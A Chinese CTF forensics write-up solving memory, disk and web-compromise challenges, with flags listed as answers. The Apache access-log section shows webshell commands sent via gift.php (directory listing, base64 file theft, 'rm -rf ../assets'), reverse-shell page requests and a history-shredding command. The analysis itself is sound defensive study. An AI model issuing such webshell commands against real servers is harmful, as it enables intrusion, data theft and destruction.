** 2716  2020  DumpIt.exe  0xfa800b5fe060  1  25  1  True  2025-10-02 17:19:00.000000 UTC  N/A  \Device\HarddiskVolume1\Users\C3ngH\Desktop\DumpIt.exe  DumpIt.exe  C:\Users\C3ngH\Desktop\DumpIt.exe

搜索一下关键词hint.txt和flag，哦吼？！

1
(base) ➜  forensics vol -f memory.raw windows.filescan | grep -i "hint.txt"
2
0x29457910 100.0\Users\C3ngH\Desktop\hint.txt
3
0x2a15a9f0  \Users\C3ngH\AppData\Roaming\Microsoft\Windows\Recent\hint.txt.lnk
4

5
(base) ➜  forensics vol -f memory.raw windows.dumpfiles --physaddr  0x29457910
6
Volatility 3 Framework 2.26.2
7
Progress:  100.00    PDB scanning finished
8
Cache  FileObject  FileName  Result
9

10
DataSectionObject  0x29457910  hint.txt  Error dumping file
11

12
(base) ➜  forensics mv file.0x29457910.0xfa8009896460.DataSectionObject.hint.txt.dat hint.txt
13
(base) ➜  forensics cat hint.txt
14
*画图*真好用啊，可以把一些我记不住的密码画出来，还不容易被其他人找到…
15
所以我每次都会新建一个和屏幕分辨率一样大小的画布然后把密码画下来嘻嘻~%
16

17
(base) ➜  forensics vol -f memory.raw windows.filescan | grep -i "flag"
18
0x2b10e070 100.0\Users\C3ngH\Desktop\flag.zip
19

20
(base) ➜  forensics vol -f memory.raw windows.dumpfiles --physaddr  0x2b10e070
21
Volatility 3 Framework 2.26.2
22
Progress:  100.00    PDB scanning finished
23
Cache  FileObject  FileName  Result
24

25
DataSectionObject  0x2b10e070  flag.zip  file.0x2b10e070.0xfa80091c7b40.DataSectionObject.flag.zip.dat
26
(base) ➜  forensics ls
27
dumpfiles                                                     proc_dumps
28
file.0x2b10e070.0xfa80091c7b40.DataSectionObject.flag.zip.dat 你也喜欢win7吗.7z
29
memory.raw
30

31
(base) ➜  forensics file file.0x2b10e070.0xfa80091c7b40.DataSectionObject.flag.zip.dat
32
file.0x2b10e070.0xfa80091c7b40.DataSectionObject.flag.zip.dat: Zip archive data, at least v2.0 to extract, compression method=AES Encrypted
33
(base) ➜  forensics mv file.0x2b10e070.0xfa80091c7b40.DataSectionObject.flag.zip.dat flag.zip
34

35
(base) ➜  forensics unzip flag.zip
36
Archive:  flag.zip
37
   skipping: flag.txt                unsupported compression method 99
38

39
(base) ➜  forensics unzip -v flag.zip
40
Archive:  flag.zip
41
 Length   Method    Size  Cmpr    Date    Time   CRC-32   Name
42
--------  ------  ------- ---- ---------- ----- --------  ----
43
      29  Unk:099      47 -62% 10-02-2025 23:35 af10f254  flag.txt
44
--------          -------  ---                            -------
45
      29               47 -62%                            1 file

他喵的，现在一看到压缩包密码就害怕😨。

1
*画图*真好用啊，可以把一些我记不住的密码画出来，还不容易被其他人找到…
2
所以我每次都会新建一个和屏幕分辨率一样大小的画布然后把密码画下来嘻嘻~%

结合题目提到的2560*1600，先dump出来再说vol -f memory.raw windows.memmap --pid 2624 --dump，获得pid.2624.dmp，然后让ai写代码提取指定大小的图片：

1
import os
2
from PIL import Image
3
import struct
4

5
# --- 配置参数 ---
6
DUMP_FILE_PATH = "pid.2624.dmp"
7
OUTPUT_DIR = "extracted_images_fixed"
8
TARGET_WIDTH = 2560
9
TARGET_HEIGHT = 1600
10
BITS_PER_PIXEL = 32  # 假设为 32-bit (BGRA)
11
# 原始像素数据大小 (2560 * 1600 * 4 字节)
12
PIXEL_DATA_SIZE = TARGET_WIDTH * TARGET_HEIGHT * (BITS_PER_PIXEL // 8)
13
# 允许的尺寸误差范围 (用于原始数据块搜索)
14
SIZE_TOLERANCE_MB = 0.5
15

16
# --- 主提取函数 ---
17

18
def search_and_extract_raw(data):
19
    """搜索原始像素数据块，强制不透明并保存为 PNG 文件"""
20

21
    print(f"[*] 正在搜索 {TARGET_WIDTH}x{TARGET_HEIGHT} 的原始像素数据 ({PIXEL_DATA_SIZE / 1024 / 1024:.2f} MB)...")
22

23
    min_size = int(PIXEL_DATA_SIZE - SIZE_TOLERANCE_MB * 1024 * 1024)
24
    export_count = 0
25

26
    # 以四分之一数据大小作为步长，提高搜索精度
27
    for offset in range(0, len(data), PIXEL_DATA_SIZE // 4):
28

29
        raw_data = data[offset : offset + PIXEL_DATA_SIZE]
30

31
        if len(raw_data) < min_size:
32
            continue
33

34
        try:
35
            # 1. 将原始字节数据解释为图像 (BGRA)
36
            # 使用 'RGBA' 模式
37
            img = Image.frombytes('RGBA', (TARGET_WIDTH, TARGET_HEIGHT), raw_data, 'raw', 'BGRA', 0, 1)
38

39
            # 2. 强制不透明处理 (关键步骤!)
40
            # 分离 R, G, B, A 通道
41
            r, g, b, a = img.split()
42
            # 创建一个新的 Alpha 通道，全部设置为 255 (完全不透明)
43
            new_a = Image.new('L', img.size, 255)
44
            # 重新合并 R, G, B, 新的 A 通道
45
            img = Image.merge('RGBA', (r, g, b, new_a))
46

47
            # 3. 垂直翻转：修复 GDI 常见的 Bottom-up 存储问题(实测不需要)
48
#            img = img.transpose(Image.FLIP_TOP_BOTTOM)
49

50
            # 4. 保存为 PNG 文件
51
            output_path = os.path.join(OUTPUT_DIR, f"mspaint_2624_0x{offset:x}_fixed.png")
52
            img.save(output_path)
53

54
            print(f"[SUCCESS] 成功导出图片 (偏移: 0x{offset:x})，已强制不透明: {output_path}")
55
            export_count += 1
56

57
        except Exception as e:
58
            # print(f"[-] 偏移 0x{offset:x} 处数据转换失败: {e}")
59
            continue
60

61
    return export_count > 0
62

63
# --- 主逻辑 ---
64

65
if __name__ == "__main__":
66
    if not os.path.exists(DUMP_FILE_PATH):
67
        print(f"[ERROR] 找不到转储文件: {DUMP_FILE_PATH}")
68
        exit(1)
69

70
    if not os.path.exists(OUTPUT_DIR):
71
        os.makedirs(OUTPUT_DIR)
72

73
    print(f"[*] 正在读取内存转储文件: {DUMP_FILE_PATH}")
74
    with open(DUMP_FILE_PATH, 'rb') as f:
75
        memory_data = f.read()
76
    print(f"[*] 文件读取完毕 ({len(memory_data) / 1024 / 1024:.2f} MB)")
77

78
    found_raw = search_and_extract_raw(memory_data)
79

80
    if not found_raw:
81
        print("\n[INFO] 未能通过原始数据块匹配导出任何图片。")
82
    else:
83
         print("\n[DONE] 所有匹配的数据块均已导出。请检查 'extracted_images_fixed' 文件夹中的 PNG 文件。")

mspaint 解压得到flag.txt

1
flag{1z_volatility_F0r3ns1c5}

[Week3] 爱茂TV#

1
Info: 题组: Forensics - 爱茂TV (已完成 2/10)
2
Info: [✔] 0. 机主使用的用户名
3
flag{hajimi}
4

5
Info: [.] 格式：形如 flag{114514} 的字符串，全部小写
6
Info: [-] 1. 机主用户信息中隐藏的 Flag（按原样提交获取到的内容）
7
/etc/passwd
8
flag{I_l0v3_M4od1e}
9

10
Info: [-] 2. 机主最近自行安装字体的家族名称
11
Info: [.] 格式：形如 flag{114514} 的字符串，全部小写
12
HarmonyOS_SansSC
13
flag{harmonyos_sanssc}
14
flag{harmonyos_sans}
15
flag{鸿蒙黑体}
16

17

18
Info: [✔] 3. 机主使用的 FTP 传输工具（全小写不含扩展名）
19
flag{filezilla}
20

21
Info: [-] 4. 机主使用这个工具登录了一个外网服务器，请找出其 IP 地址与密码
22
Info: [.] 格式：flag{IP地址$密码}，形如 flag{114.514.19.19$810}
23

24

25
<?xml version="1.0" encoding="UTF-8"?>
26
<FileZilla3 version="3.68.1" platform="*nix">
27
  <RecentServers>
28
    <Server>
29
      <Host>192.168.233.1</Host>
30
      <Port>21</Port>
31
      <Protocol>0</Protocol>
32
      <Type>0</Type>
33
      <User>hajimi</User>
34
      <Pass encoding="base64">MTE0NTE0</Pass>
35
      <Logontype>1</Logontype>
36
      <PasvMode>MODE_DEFAULT</PasvMode>
37
      <EncodingType>Auto</EncodingType>
38
      <BypassProxy>0</BypassProxy>
39
    </Server>
40
    <Server>
41
      <Host>112.2.196.181</Host>
42
      <Port>21</Port>
43
      <Protocol>0</Protocol>
44
      <Type>0</Type>
45
      <User>hajimi</User>
46
      <Pass encoding="base64">MTE0X1M0ZjNQd2RfNTE0</Pass>
47
      <Logontype>1</Logontype>
48
      <PasvMode>MODE_DEFAULT</PasvMode>
49
      <EncodingType>Auto</EncodingType>
50
      <BypassProxy>0</BypassProxy>
51
    </Server>
52
    <Server>
53
      <Host>192.168.233.128</Host>
54
      <Port>21</Port>
55
      <Protocol>0</Protocol>
56
      <Type>0</Type>
57
      <User>hajimi</User>
58
      <Pass encoding="base64">MTE0NTE0</Pass>
59
      <Logontype>1</Logontype>
60
      <PasvMode>MODE_DEFAULT</PasvMode>
61
      <EncodingType>Auto</EncodingType>
62
      <BypassProxy>0</BypassProxy>
63
    </Server>
64
    <Server>
65
      <Host>127.0.0.1</Host>
66
      <Port>21</Port>
67
      <Protocol>0</Protocol>
68
      <Type>0</Type>
69
      <User>hajimi</User>
70
      <Pass encoding="base64">MTE0NTE0</Pass>
71
      <Logontype>1</Logontype>
72
      <PasvMode>MODE_DEFAULT</PasvMode>
73
      <EncodingType>Auto</EncodingType>
74
      <BypassProxy>0</BypassProxy>
75
    </Server>
76
  </RecentServers>
77
</FileZilla3>
78

79

80
外网
81
flag{112.2.196.181$114_S4f3Pwd_514}
82

83
Info: [-] 5. 机主对外通信使用的邮箱地址
84
flag{praxoppogrebro-5874@yopmail.net}
85

86
cat ./home/hajimi/.mozilla/firefox/djexozqp.default-esr/extension-settings.json
87
# 在 profile 目录统计所有出现过的邮箱并按次数排序（便于优先判断）
88
grep -RIna --binary-files=without-match -E "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}\b" . 2>/dev/null \
89
  | grep -o -E "\b[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\.[A-Za-z]{2,}\b" | sort | uniq -c | sort -nr | sed -n '1,50p'
90

91

92
Info: [-] 6. "加速器安装程序"的 MD5 值（全小写）
93
flag{7ce89dbb371ae598702e111cede3d75a}
94

95
Info: [-] 7. "加速器安装程序"释放的文件中，有一个是端口扫描程序经重命名而成，请找出其文件名与原程序名。
96
Info: [.] 格式：flag{文件名#原程序名}
97
flag{ls#fscan}
98

99
Info: [-] 8. "加速器安装程序"中的哪一行命令导致机主无法正常登录图形界面
100
Info: [.] 格式：flag{一行内的完整命令}
101
flag{systemctl disable lightdm >/dev/null 2>&1 || true}
102

103

104
Info: [-] 9. Shell 无法使用是由于什么文件被修改了？机主依然能使用哪些 Shell 登录（按字母序列出可执行文件名）？
105
Info: [.] 格式：flag{文件#shellA#shellB#...}，使用#分隔
106
flag{/etc/bash.bashrc#dash#sh}
107

108

109
chao@kali:/Users/chao/tmp/ctf/forensics/[Week3] 爱茂TV/mnt$ sed -n '1,120p' ./etc/shells
110
# /etc/shells: valid login shells
111
/bin/sh
112
/usr/bin/sh
113
/bin/bash
114
/usr/bin/bash
115
/bin/rbash
116
/usr/bin/rbash
117
/usr/bin/dash
118

119
chao@kali:/Users/chao/tmp/ctf/forensics/[Week3] 爱茂TV/mnt$ find home -type f -iname "sitemanager.xml" -o -iname "*filezilla*" 2>/dev/null
120
home/hajimi/.cache/filezilla
121
home/hajimi/文档/filezilla.log

[Week4] 安卓服务？安卓人？#

arch 我炒，Arch！不过uuid变了还得手动改fstab zen内核，有品！

先看小作文：

1
你好🍎人[root@arch chenfeng]# cat Documents/diary-chenfeng.md
2
# 澄峰建站日记
3

4
## 2025-10-08
5

6
有个工作上的同事看我在做祝福视频，说订单收入还是在用电子表格去记不是很好，建议我搞个“全栈”网页。说是不仅方便管理，还有助于宣传涨热度...我问他能不能帮我做，他却回道“真做不出苹果项目”。
7

8
切，不就是看我火了嫉妒不想帮我做呗——你们这群安卓素质、安卓语法、安卓态度的安卓人真是够了，我还巴不得呢。听说 AI 啥的做这东西很专业，只需要写几句话就能出一个项目，我倒来试试看。
9

10
## 2025-10-10
11

12
可惜我有点拖延症，不过这 Copilot 真是帮了大忙，不出几轮对话就把项目生成出来了。接下来是要配环境，按 AI 说的要搞一个 LAMP 栈，估计还要一段时间。
13

14
## 2025-10-12
15

16
尝试着按网上的文档配了网站，结果移动的时候提示权限不足。
17

18
我就纳闷了，一个只有本地用户才能访问的服务器目录设置这么复杂的权限干什么？这一定是安卓开发者的阴谋！我把它改成 777 了，看你还怎么报错。
19

20
## 2025-10-14
21

22
配置 Apache 服务，几度要飞升。
23

24
先是访问子目录报 404，AI 说要用 vhost，结果这样一下来全都访问不了；数据库也是，一行一行敲的创建表代码，到访问的时候怎么会出问题？！AI 也行不通吗？安卓 AI。同事见我搞两个多小时红温了，才笑嘻嘻地过来教我改权限...什么安卓态度，搞得我好像不会自己做一样。
25

26
真是越想越来气，这些软件的开发者用的配置文件五花八门，文档也生硬晦涩，怕我们苹果人看不懂，这样就好低声下气问他们？？安卓服务！不，我的服务才不会是安卓服务。我们苹果人搭起来的服务必定是苹果服务。
27

28
## 2025-10-15
29

30
我不管了。今晚！这个属于我的苹果服务就要上线。不计一切代价，*安卓人除外*。
31

32
不过现有的数据量还是不够多，我得生成一些，不然也太冷清了。
33

34
**更新：**那个房管怎么知道我这服务的？！坏事了，这留言删都删不掉...算是记住你了；；不过你虚报一千什么意思？？！
35

36
**更新：**想来想去这个本月开销还是把前面一段时间的收支补上去好了，看着也显得我澄峰不是一般人，嘿嘿 我就是苹果人，不接受反驳。
37

38
## 2025-10-16
39

40
卧槽，我的赞助记录怎么全没了？订单记录也一团糟！傻了傻了，得赶快请个高人。
41

42
**更新：**想来想去还是睡不着，这么苹果的服务是怎么被攻击到的...也许我并不是100%的苹果人吧。
43

44
**更新：**质疑这个服务存在的意义了。删几个文件以儆效尤。

1
Info: 欢迎来到 ?CTF 2025 Android Platform！目前有 1 个题组。
2
Info: 初来乍到，输入 help 获取使用帮助。
3
NekoChecker [/] > show 0
4
Info: 题组: Forensics - 安卓服务？安卓人？ (已完成 0/10)
5

6
Info: [-] 0. 攻击事件发生在外网(WAN)还是内网(LAN)？并指出被攻击机器在网络的IP
7
Info: [.] 格式：flag{答案1#1.1.1.1}，第一个问题使用 `WAN` / `LAN` 回答
8
flag{LAN#192.168.119.139}✅
9

10
Info: [-] 1. 网页服务器连接使用的用户、密码与数据库名称
11
Info: [.] 格式：flag{用户名:密码@数据库名称}
12
flag{chenfeng:pingguochenfeng@chenfeng-db}✅
13

14
Info: [-] 2. Web服务于受攻击时段启动与关闭的时间
15
Info: [.] 格式：flag{hh:mm:ss-hh:mm:ss}
16
flag{20:00:08-22:31:11}✅
17

18
Info: [-] 3. 攻击者利用最多的 WebShell 文件名与连接密码
19
Info: [.] 格式：flag{filename.php&password}
20
flag{gift.php&chenfeng}✅
21

22
Info: [-] 4. 攻击者未能获得后端源码的原因是权限不对，
23
找出攻击者试图访问时使用的用户名与未能访问目录的权限
24
Info: [.] 格式：flag{username#%%%}，%代表一位数字
25
flag{http#700}✅
26

27
Info: [-] 5. 对数据库做出破坏的攻击者IP与可能执行的SQL语句
28
Info: [.] 格式：flag{1.1.1.1#command object}，SQL语句指令全小写且只有一行，无尾随分号
29
flag{192.168.119.1#drop table sponsorship}✅
30

31
Info: [-] 6. 扣除可能的欠款后，澄峰的收入与支出总和（一个有符号数）
32
-54552 欠2000（3000里虚报了1000）
33
flag{-56552}✅
34

35
Info: [-] 7. 数据库现存内容中的flag
36
flag{W3_w0uld_bec0me_fr1eNds_@ga1n}✅
37

38
Info: [-] 8. 除去赞助收入，澄峰的第一大收入来源与数额
39
Info: [.] 格式：flag{source#amount}
40
flag{直播间礼物#228220}✅
41

42

43
Info: [-] 9. 澄峰崩溃至极，使用了工具来深度删除文件，他使用了什么命令实现这一点
44
Info: [.] 格式：flag{命令}
45
flag{shred -uz .bash_history}✅

简单探索，这个.viminfo很好用

1
你好🍎人[root@arch ~]# cat .viminfo
2
> /etc/httpd/conf/httpd.conf
3
  *  1760529606  0
4
  "  231  0
5
  ^  231  1
6
  .  231  0
7
  +  52  0
8
  +  231  0
9
你好🍎人[root@arch ~]# ls
10
你好🍎人[root@arch ~]# cat /etc/httpd/conf/httpd.conf
11

12
<IfModule ssl_module>
13
SSLRandomSeed startup builtin
14
SSLRandomSeed connect builtin
15
</IfModule>
16

17
IncludeOptional conf/conf.d/*.conf
18

19
Include conf/extra/php-fpm.conf
20

21
    ProxyPreserveHost On
22
    ProxyTimeout 60
23

24
    # 将 /api 转发到 127.0.0.1:5174（你的 FastAPI）
25
    ProxyPass        /api/ http://127.0.0.1:5174/api/ retry=0
26
    ProxyPassReverse /api/ http://127.0.0.1:5174/api/
27

28
    # 可选：为静态资源添加缓存头
29
    <FilesMatch "\\.(js|css|png|jpg|jpeg|gif|svg|ico)$">
30
        Header set Cache-Control "public, max-age=31536000, immutable"
31
    </FilesMatch>
32

33

34

35
# History of marks within files (newest to oldest):
36

37
> /etc/httpd/conf/httpd.conf
38
  *  1760367950  0
39
  "  288  20
40
  ^  288  21
41

42
> /var/log/httpd/error_log
43
  *  1760367793  0
44
  "  917  0
45

46
> /var/log/httpd/access_log
47
  *  1760367775  0
48
  "  277  0
49

50
> ~/Desktop/cfvideo/apps/python-server/start.sh
51
  *  1760359706  0
52
  "  9  29
53
  ^  8  2
54
  .  8  1
55
  +  9  51
56
  +  8  1
57

58
> /srv/http/test.php
59
  *  1760352730  0
60
  "  2  0
61
  ^  2  0
62
  .  1  19
63
  +  1  19
64

65
> /etc/bash.bashrc
66
  *  1760332289  0
67
  "  12  47
68
  ^  12  48
69

70
> /etc/bash.bash
71
  *  1760331537  0
72
  "  1  0
73

74
你好🍎人[root@arch chenfeng]# cat /home/chenfeng/Desktop/cfvideo/apps/python-server/start.sh
75
#!/bin/bash
76
# Python 后端服务启动脚本 (Unix/Linux/macOS)
77

78
# 切换到脚本所在目录
79
cd "$(dirname "$0")"
80

81
echo "启动 Python FastAPI 服务..."
82
# python3 run.py
83
uvicorn main:app --host 0.0.0.0 --port 5174 --reload
84

85

86
你好🍎人[chenfeng@arch ~]$ cat mount-shared.sh
87
#!/bin/bash
88

89
sudo /usr/bin/vmhgfs-fuse .host:/ /home/chenfeng/shares -o subtype=vmhgfs-fuse,allow_other
90

91

92
你好🍎人[chenfeng@arch ~]$ cat /etc/bash.bashrc
93
#
94
# /etc/bash.bashrc
95
#
96

97
# If not running interactively, don't do anything
98
[[ $- != *i* ]] && return
99

100
# Prevent doublesourcing
101
if [[ -z "${BASHRCSOURCED}" ]] ; then
102
  BASHRCSOURCED="Y"
103
  # the check is bash's default value
104
  [[ "$PS1" = '\s-\v\$ ' ]] && PS1='你好🍎人[\u@\h \W]\$ '
105
  case ${TERM} in
106
    Eterm*|alacritty*|aterm*|foot*|gnome*|konsole*|kterm*|putty*|rxvt*|tmux*|xterm*)
107
      PROMPT_COMMAND+=('printf "\033]0;%s@%s:%s\007" "${USER}" "${HOSTNAME%%.*}" "${PWD/#$HOME/\~}"')
108
      ;;
109
    screen*)
110
      PROMPT_COMMAND+=('printf "\033_%s@%s:%s\033\\" "${USER}" "${HOSTNAME%%.*}" "${PWD/#$HOME/\~}"')
111
      ;;
112
  esac
113
fi
114

115
if [[ -r /usr/share/bash-completion/bash_completion ]]; then
116
  . /usr/share/bash-completion/bash_completion
117
fi

看access_log大概可以看出来传了个一句话

1
192.168.119.128 - - [15/Oct/2025:21:37:16 +0800] "GET /uploads/gift.php HTTP/1.1" 500 -
2
192.168.119.128 - - [15/Oct/2025:21:37:16 +0800] "GET /uploads/gift.php HTTP/1.1" 500 -
3
192.168.119.128 - - [15/Oct/2025:21:37:17 +0800] "GET /uploads/gift.php HTTP/1.1" 500 -
4
192.168.119.128 - - [15/Oct/2025:21:38:40 +0800] "GET /uploads/gift.php?chenfeng=114 HTTP/1.1" 200 -
5
192.168.119.1 - - [15/Oct/2025:21:39:23 +0800] "POST / HTTP/1.1" 200 411
6
192.168.119.1 - - [15/Oct/2025:21:39:46 +0800] "POST / HTTP/1.1" 200 411
7
192.168.119.1 - - [15/Oct/2025:21:39:49 +0800] "POST / HTTP/1.1" 200 411
8
192.168.119.1 - - [15/Oct/2025:21:39:51 +0800] "POST / HTTP/1.1" 200 411
9
192.168.119.128 - - [15/Oct/2025:21:42:56 +0800] "GET /uploads/gift.php?chenfeng=ls HTTP/1.1" 200 58
10
192.168.119.128 - - [15/Oct/2025:21:43:06 +0800] "GET /uploads/gift.php?chenfeng=ls%20.. HTTP/1.1" 200 26
11
192.168.119.128 - - [15/Oct/2025:21:43:10 +0800] "GET /uploads/gift.php?chenfeng=ls%20../.. HTTP/1.1" 200 9
12
192.168.119.128 - - [15/Oct/2025:21:43:16 +0800] "GET /uploads/gift.php?chenfeng=ls%20/ HTTP/1.1" 200 99
13
192.168.119.1 - - [15/Oct/2025:21:43:33 +0800] "POST / HTTP/1.1" 200 411
14
192.168.119.1 - - [15/Oct/2025:21:43:44 +0800] "POST /uploads/gift.php HTTP/1.1" 500 -
15
192.168.119.1 - - [15/Oct/2025:21:43:54 +0800] "POST /uploads/gift.php HTTP/1.1" 500 -
16
192.168.119.1 - - [15/Oct/2025:21:44:11 +0800] "POST /uploads/gift.php HTTP/1.1" 500 -
17
192.168.119.1 - - [15/Oct/2025:21:44:12 +0800] "POST /uploads/gift.php HTTP/1.1" 500 -
18
192.168.119.1 - - [15/Oct/2025:21:44:15 +0800] "POST /uploads/gift.php HTTP/1.1" 500 -
19
192.168.119.1 - - [15/Oct/2025:21:44:17 +0800] "POST /uploads/gift.php HTTP/1.1" 500 -
20
192.168.119.1 - - [15/Oct/2025:21:44:32 +0800] "POST /uploads/gift.php HTTP/1.1" 500 -
21
192.168.119.1 - - [15/Oct/2025:21:45:13 +0800] "POST /uploads/gift.php HTTP/1.1" 500 -
22
192.168.119.1 - - [15/Oct/2025:21:45:25 +0800] "POST /uploads/gift.php HTTP/1.1" 500 -
23
192.168.119.1 - - [15/Oct/2025:21:45:36 +0800] "POST /uploads/gift.php HTTP/1.1" 500 -
24
192.168.119.1 - - [15/Oct/2025:21:45:41 +0800] "POST /uploads/gift.php HTTP/1.1" 500 -
25
192.168.119.1 - - [15/Oct/2025:21:46:20 +0800] "GET / HTTP/1.1" 304 -
26
192.168.119.1 - - [15/Oct/2025:21:46:20 +0800] "GET /api/requests HTTP/1.1" 200 1817
27
192.168.119.1 - - [15/Oct/2025:21:47:29 +0800] "POST /api/requests HTTP/1.1" 200 11
28
192.168.119.1 - - [15/Oct/2025:21:47:29 +0800] "GET /api/requests HTTP/1.1" 200 1990
29
192.168.119.1 - - [15/Oct/2025:21:47:39 +0800] "POST /uploads/video.php HTTP/1.1" 200 -
30
192.168.119.1 - - [15/Oct/2025:21:47:44 +0800] "POST /uploads/video.php HTTP/1.1" 200 -
31
192.168.119.128 - - [15/Oct/2025:21:48:30 +0800] "GET /uploads/gift.php?chenfeng=ls%20/home HTTP/1.1" 200 9
32
192.168.119.128 - - [15/Oct/2025:21:48:33 +0800] "GET /uploads/gift.php?chenfeng=ls%20/home/chenfeng HTTP/1.1" 200 -
33
192.168.119.128 - - [15/Oct/2025:21:48:39 +0800] "GET /uploads/gift.php?chenfeng=ls%20/ HTTP/1.1" 200 99
34
192.168.119.128 - - [15/Oct/2025:21:48:57 +0800] "GET /uploads/gift.php?chenfeng=ls%20/srv HTTP/1.1" 200 9
35
192.168.119.128 - - [15/Oct/2025:21:49:00 +0800] "GET /uploads/gift.php?chenfeng=ls HTTP/1.1" 200 68
36
192.168.119.128 - - [15/Oct/2025:21:50:08 +0800] "GET /uploads/gift.php?chenfeng=ls HTTP/1.1" 200 68
37
192.168.119.128 - - [15/Oct/2025:21:52:07 +0800] "POST /api/requests HTTP/1.1" 200 11
38
192.168.119.128 - - [15/Oct/2025:21:52:07 +0800] "GET /api/requests HTTP/1.1" 200 2160
39
192.168.119.128 - - [15/Oct/2025:21:52:22 +0800] "GET /uploads/php-reverse-shell.php HTTP/1.1" 200 -
40
192.168.119.128 - - [15/Oct/2025:21:52:27 +0800] "GET /uploads/php-reverse-shell.php HTTP/1.1" 200 -
41
192.168.119.128 - - [15/Oct/2025:21:53:20 +0800] "GET /uploads/gift.php?chenfeng=ls%20.. HTTP/1.1" 200 26
42
192.168.119.128 - - [15/Oct/2025:21:53:33 +0800] "GET /uploads/gift.php?chenfeng=cat%20../index.html HTTP/1.1" 200 411
43
192.168.119.128 - - [15/Oct/2025:21:53:44 +0800] "GET /uploads/gift.php?chenfeng=ls%20.. HTTP/1.1" 200 26
44
192.168.119.128 - - [15/Oct/2025:21:54:06 +0800] "GET /uploads/gift.php?chenfeng=rm%20-rf%20../assets HTTP/1.1" 200 -
45
192.168.119.128 - - [15/Oct/2025:21:54:10 +0800] "GET /uploads/gift.php?chenfeng=ls%20.. HTTP/1.1" 200 26
46
192.168.119.128 - - [15/Oct/2025:21:54:21 +0800] "GET /uploads/gift.php?chenfeng=ls%20/var HTTP/1.1" 200 63
47
192.168.119.128 - - [15/Oct/2025:21:54:32 +0800] "GET /uploads/gift.php?chenfeng=whoami HTTP/1.1" 200 5
48
192.168.119.1 - - [15/Oct/2025:21:54:46 +0800] "POST /api/admin/query HTTP/1.1" 200 2160
49
192.168.119.1 - - [15/Oct/2025:21:55:02 +0800] "POST /api/admin/query HTTP/1.1" 500 147
50
192.168.119.1 - - [15/Oct/2025:21:55:39 +0800] "POST /api/admin/query HTTP/1.1" 200 50741
51
192.168.119.1 - - [15/Oct/2025:21:56:44 +0800] "POST /api/admin/query HTTP/1.1" 500 199
52
192.168.119.1 - - [15/Oct/2025:21:56:47 +0800] "POST /api/admin/query HTTP/1.1" 200 21395
53
192.168.119.1 - - [15/Oct/2025:21:57:24 +0800] "POST /api/admin/query HTTP/1.1" 500 318
54
192.168.119.1 - - [15/Oct/2025:21:57:53 +0800] "POST /api/admin/query HTTP/1.1" 500 87
55
192.168.119.1 - - [15/Oct/2025:21:58:10 +0800] "GET /api/sponsorship HTTP/1.1" 500 21
56
192.168.119.1 - - [15/Oct/2025:21:58:15 +0800] "GET /api/users HTTP/1.1" 500 21
57
192.168.119.1 - - [15/Oct/2025:21:58:16 +0800] "GET /api/requests HTTP/1.1" 200 2160
58
192.168.119.1 - - [15/Oct/2025:21:58:19 +0800] "GET /api/budget HTTP/1.1" 200 48866
59
192.168.119.1 - - [15/Oct/2025:21:58:30 +0800] "GET /admin/114 HTTP/1.1" 304 -
60
192.168.119.1 - - [15/Oct/2025:21:58:30 +0800] "GET /api/users HTTP/1.1" 500 21
61
192.168.119.1 - - [15/Oct/2025:21:58:31 +0800] "POST /api/admin/query HTTP/1.1" 200 2160
62
192.168.119.1 - - [15/Oct/2025:21:59:05 +0800] "GET /api/budget/info HTTP/1.1" 200 30
63
192.168.119.1 - - [15/Oct/2025:21:59:09 +0800] "POST /api/sponsorship HTTP/1.1" 500 21
64
192.168.119.128 - - [15/Oct/2025:22:17:26 +0800] "GET /uploads/gift.php?chenfeng=id HTTP/1.1" 200 42
65
192.168.119.1 - - [15/Oct/2025:22:28:30 +0800] "GET /uploads/.face HTTP/1.1" 200 411
66
192.168.119.1 - - [15/Oct/2025:22:28:37 +0800] "GET /uploads/gift.php HTTP/1.1" 500 -
67
192.168.119.1 - - [15/Oct/2025:22:28:43 +0800] "GET /uploads/gift.php?chenfeng=ls HTTP/1.1" 200 90
68
192.168.119.1 - - [15/Oct/2025:22:28:53 +0800] "GET /uploads/gift.php?chenfeng=cat%201799B235A5DBBB926E4C0A1860343BE5.jpg%20|%20base64 HTTP/1.1" 200 143877
69
192.168.119.1 - - [15/Oct/2025:22:29:55 +0800] "POST /api/requests HTTP/1.1" 200 11
70
192.168.119.1 - - [15/Oct/2025:22:29:55 +0800] "GET /api/requests HTTP/1.1" 200 2816

用得最多的就是这个了吧 /uploads/gift.php?chenfeng=

看源码找到下列内容，主要关注mysql，弱密码应该是攻击者的入口：

1
MYSQL_URL = "mysql+pymysql://chenfeng:pingguochenfeng@127.0.0.1:3306/chenfeng-db"
2

3
    if username == "admin" and password == "123456":
4
        return {"success": True}

虚拟机跑不起来，chroot进去直接启动sql

1
mkdir -p /run/mysqld
2
chown mysql:mysql /run/mysqld
3
chmod 755 /run/mysqld
4
/usr/bin/mysqld --skip-networking --user=mysql &

sql

这里我是直接dump出来，然后就可以在.sql文件里复制账单了。

1
from collections import defaultdict
2

3
data = [
4
(1,'苹果赞助',1000,'2025-10-15 19:38:28.858'),
5
(2,'苹果赞助',514,'2025-10-15 19:39:06.000'),
6
(3,'苹果赞助',5900,'2025-10-15 19:39:24.924'),
7
(4,'视频订单',200,'2025-10-15 19:42:57.673'),
8
(5,'视频订单',1000,'2025-10-15 19:52:03.451'),
9
(6,'视频订单',200,'2025-10-15 20:04:58.023'),
10
(7,'视频订单',0,'2025-10-15 20:20:04.795'),
11
(8,'购买力测评',-100,'2025-10-07 11:45:14.000'),
12
(9,'工作室设备',-7500,'2025-10-01 15:31:39.000'),
13
(10,'未成年退款',-100,'2025-10-04 11:00:07.000'),
14
(11,'未成年退款',-50,'2025-10-04 14:22:33.000'),
15
(12,'给亲戚红包',-500,'2025-10-04 12:00:00.000'),
16
(13,'拼手气红包',250,'2025-10-01 00:00:04.000'),
17
(14,'代理',-99,'2025-10-01 15:30:21.000'),
18
(15,'未成年退款',-666,'2025-10-02 02:25:57.000'),
19
# 后续省略，复制过来就好了
20
]
21

22
# 初始化一个字典来存储每个类别的总额
23
category_totals = defaultdict(int)
24

25
# 遍历数据并按类别汇总金额
26
for _, category, amount, _ in data:
27
    category_totals[category] += amount
28

29
# 打印结果，并按总额降序排列
30
for category, total in sorted(category_totals.items(), key=lambda item: item[1], reverse=True):
31
    print(f"{category}: {total}")
32

33
# 计算总结余，即所有第三项金额的总和
34
total_balance = sum(item[2] for item in data)
35

36
print(f"总的结余是: {total_balance}")

输出结果：

1
直播间礼物: 228220
2
苹果赞助: 121492
3
